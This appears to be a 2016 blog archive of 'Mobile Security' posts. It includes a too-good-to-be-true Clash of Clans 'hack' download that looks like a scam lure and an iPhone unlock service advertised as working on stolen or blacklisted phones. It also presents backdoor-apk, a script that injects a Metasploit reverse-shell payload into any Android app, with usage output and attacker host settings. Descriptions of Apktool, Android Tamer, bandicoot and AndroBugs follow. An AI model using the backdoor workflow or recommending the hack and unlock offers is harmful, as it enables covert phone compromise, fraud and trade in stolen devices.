Showing posts with label Mobile Security. Show all posts
Showing posts with label Mobile Security. Show all posts

Friday, August 5, 2016

{IOS+ANDRIOD} Clash of clans hack | PRIVATE SERVER | FREE! NO JAILBREAK! NO SURVAY

So many fake clash of clans hacks. A buddy of mine showed me this simple trick to get unlimited everything. The trick is called "God-Of-Gems". It's a very simple program. The program will get you a .ipa that you will later import into your device using "I-Funbox".

WORKING AS OF 5/31/15

ENJOY! PLEASE EMAIL: botzone0@gmail.com for setup help!

Tags:
Gems hack
Gold hack
Elixir hack
Anti-ban
User-friendly design
Android/iOs/Social platforms compatible
Jail break require: NO
Root require: NO
100% virus safe
Automatic update check
Many other resources



IOS(IPHONE) link
ANDRIOD LINK

Thursday, August 4, 2016

How To Factory Unlock Your IPhone Rite from your Home



Recently i came across a website where you can Factory unlock any iPhone permanently rite from you home .I Factory unlocked my iphone 5 locked To AT&T in just 6 hours .


Why to unlock your iPhone what difference will it make ? 

  • After unlocking you can use your iphone with any Gsm carrier in the world . Means you can shift  to any carrier that best suits  your needs .
  • Unlike soft ware or hardware unlocks this wont void your warranty .
  • Its safe and fast you just need to order the unlock , and restore your iphone from itunes  to get it unlocked as simple as that .
  • You can increase the resale value of your iphone .
  • you can even unlock black listed , stolen or insurance claimed phones . they will work normally like a factory unlocked phone after unlocking 
 What models are supported ?

 The big thing is you unlock almost all iPhone models from 40 countries and 500 different carriers around the world . Breakthelock.com supports all base bands and firmware versions . 

unlike software unlocks or jailbreaks , This is a permanent solution you just need to unlock it once and you iphone will stay unlocked forever .You can update IOS, sync with iTunes ,change Sim cards when ever you like with of the fear of ever re locking again

Visit Site

Backdoor Android APK: backdoor-apk


 backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.


Usage
root@kali:~/Android/evol-lab/BaiduBrowserRat# ./backdoor-apk.sh BaiduBrowser.apk 
[*] Generating reverse tcp meterpreter payload...done.
[+] Handle the meterpreter connection at: 10.6.9.31:1337
[*] Decompiling original APK file...done.
[*] Decompiling RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Merging permissions of original and payload projects...done.
[*] Recompiling original project with backdoor...done.
[*] Signing recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the ‘original/dist’ directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection at the specified IP and port.

Backdoor Android APK Requirements:

In addition to the obvious tools/utilities  in use the following packages were also required on Kali Linux
apt-get install lib32stdc++6 lib32ncurses5 lib32z1

Example

./backdoor-apk.sh original.apk

Config

modify the following values as necessary
MSFVENOM=msfvenom
LHOST="10.6.9.31"
LPORT="1337"
APKTOOL=apktool2
MY_PATH=`pwd`
ORIG_APK_FILE=$1
RAT_APK_FILE=Rat.apk
LOG_FILE=run.log



Download

Reverse Engineering Android apk Files: Apktool


Reverse Engineering Android apk Files

ApkTool is a tool for reverse engineering 3rd party, closed, binary Android apps. It can decode resources to nearly original form and rebuild them after making some modifications; it makes possible to debug smali code step by step. Also it makes working with app easier because of project-like files structure and automation of some repetitive tasks like building apk, etc.

It is NOT intended for piracy and other non-legal uses. It could be used for localizing, adding some features or support for custom platforms and other GOOD purposes. Just try to be fair with authors of an app, that you use and probably like.

Features

  • Disassembling resources to nearly original form (including resources.arsc, classes.dex, 9.png. and XMLs)
  • Rebuilding decoded resources back to binary APK/JAR
  • Organizing and handling APKs that depend on framework resources
  • Smali Debugging (to be removed in 2.1.0 in favor of IdeaSmali)
  • Helping with repetitive tasks

Requirements

  • Java 7 (JRE 1.7)
  • Basic knowledge of Android SDK, AAPT and smali

How to Build Apktool from source

Apktool is a collection of 1 project, containing 4 sub-projects and a few dependencies.
  • brut.apktool.lib – (Main, all the Library code)
  • brut.apktool.cli – The cli interface of the program
  • brut.j.dir – Utility project
  • brut.j.util – Utility project
  • brut.j.common – Utility project
The main project can be found below

Requirements

  • JDK (1.7)
  • git

Build Steps

We use gradle to build. It’s pretty easy. First clone the repository.
  1. git clone git://github.com/iBotPeaches/Apktool.git
  2. cd Apktool
  3. For steps 3-5 use ./gradlew for unix based systems or gradlew.bat for windows.
  4. [./gradlew][gradlew.bat] build fatJar – Builds Apktool, including final binary.
  5. Optional (You may build a Proguard jar) [./gradlew][gradlew.bat] build fatJar proguard
After 1-2 minutes you should have a jar file at
./brut.apktool/apktool-cli/build/libs/apktool-xxxxx.jar


Download

Live Platform for Android Security Professionals: Android Tamer


Live Platform for Android Security Professionals

      AndroidTamer started out as a VirtualMachine for Android Security Professionals.  This Environment allows people to work on large array of android security related task’s ranging from Malware Analysis, Penetration Testing and Reverse Engineering. AndroidTamer is, at this point the only fully non-commercial non-sponsored entity in Android Security ecosystem.
Android Tamer can work with as little as 512Mb RAM, however if you plan on keeping the eclipse environment running it is suggested to pack at east 1G – 1.5G ram.  Customized to the core, Debian 8 based virtual machine environment is preloaded with tools for Android Pentesting.  AndroidTamer Virtual Machine is a 5.1 GB OVA file ! A lot can be stored in 5GB and you can find all the tools stored inside /Arsenal Folder. Repos have been tested on Debian 8 and they should also work on Kali Linux and Ubuntu 14.04 or 16.04.


Features

  • VirtualBox
  • Android
  • Security
  • Pentesting
  • Malware Analysis
  • Dynamic Analysis
  • Static Analysis
  • Development

Details
  • Debian 8 Base
  • Own repository of tools (repo.androidtamer.com)
  • Signed packages and repository
  • additional Wrappers around useful tools to make life easier
  • everything in path


AndroidTamer Repository in Debian 8

How to configure
$ echo "deb https://repo.androidtamer.com Tamer4 main" | sudo tee  /etc/apt/sources.list.d/repo_androidtamer_com.list
Adding GPG Key
wget -qO - https://androidtamer.com/repo.gpg.key | sudo apt-key add -
Enable HTTPS Debian repositories
sudo apt-get install apt-transport-https
How to install pacakges
$ sudo apt-get update
$ sudo apt-get install <package name>

Default username and password?

username: android
password: tamer
android user has sudo access


Download

Analyze Mobile Phone Metadata: bandicoot


Analyze Mobile Phone Metadata with  bandicoot

     bandicoot (http://bandicoot.mit.edu ) is Python toolbox to analyze mobile phone metadata. It provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results. It includes an interactive visualization, support for mobile phone recharges, support for Python 3, and clustering algorithms to handle both antenna and GPS locations.
bandicoot provides a complete, easy-to-use environment for data-scientist to analyze mobile phone metadata. With only a few lines of code, load your datasets, visualize the data, perform analyses, and export the results.  There are 1400+ behavioral indicators that are falling into three categories: individual(e.g. number of calls, text response rate), spatial (e.g. radius of gyration, entropy of places), and social network (e.g. clustering coefficient).  bandicoot also has built-in visualization tools. Load a user’s file and visualize his social graph, mobility pattern, and interactions. Check out our IPython notebook for live examples.

Try bandicoot on your phone ?

You can use  Android application to export all your call and text logs into a CSV file. This file can then be imported into the bandicoot toolbox for analysis and visualization.


Dependencies

bandicoot has no dependencies, which allows users to easily compute indicators on a production machine. To run tests and compile the visualization, optional dependencies are needed:

The source code is currently hosted on Github at https://github.com/yvesalexandre/bandicoot. Binary installers for the latest released version are available at the Python package index:
http://pypi.python.org/pypi/bandicoot/
And via easy_install:
easy_install bandicoot
or pip:
pip install bandicoot

AndroBugs Framework


AndroBugs Framework

    AndroBugs Framework is an Android vulnerability analysis system that helps developers or hackers find potential security vulnerabilities in Android applications. No splendid GUI interface, but the most efficient (less than 2 minutes per scan in average) and more accurate.



Features:

  • Find security vulnerabilities in an Android app
  • Check if the code is missing best practices
  • Check dangerous shell commands (e.g. “su”)
  • Collect Information from millions of apps
  • Check the app’s security protection (marked as <Hacker>, designed for app repackaging hacking)

Requirements

  • Python 2.7.x (DO NOT USE Python 3.X)
  • PyMongo library (If you want to use the massive analysis tool)

androBug Framework ScreenShot


Setup Steps and Usage for Windows


Easy to use for Android developers or hackers on Microsoft Windows: (a) No need to install Python 2.7 (b) No need to install any 3rd-party library (c) No need to install AndroBugs Framework
  1. mkdir C:\AndroBugs_Framework
  2. cd C:\AndroBugs_Framework
  3. Unzip the latest Windows version of AndroBugs Framework from Windows releases
  4. Go to Computer->System Properties->Advanced->Environment Variables. Add “C:\AndroBugs_Framework” to the “Path” variable
  5. androbugs.exe -h
  6. androbugs.exe -f [APK file]

Usage for Unix/Linux


To run the AndroBugs Framework:
python androbugs.py -f [APK file]
To check the usage:
python androbugs.py -h

Usage of Massive Analysis Tools for Unix/Linux


Prerequisite: Setup MongoDB and config your own MongoDB settings in “androbugs-db.cfg”
To run the massive analysis for AndroBugs Framework:
python AndroBugs_MassiveAnalysis.py -b [Your_Analysis_Number] -t [Your_Analysis_Tag] -d [APKs input directory] -o [Report output directory]
Example:
python AndroBugs_MassiveAnalysis.py -b 20151112 -t BlackHat -d ~/All_Your_Apps/ -o ~/Massive_Analysis_Reports
To get the summary report and all the vectors of massive analysis:
python AndroBugs_ReportSummary.py -m massive -b [Your_Analysis_Number] -t [Your_Analysis_Tag]
Example:
python AndroBugs_ReportSummary.py -m massive -b 20151112 -t BlackHat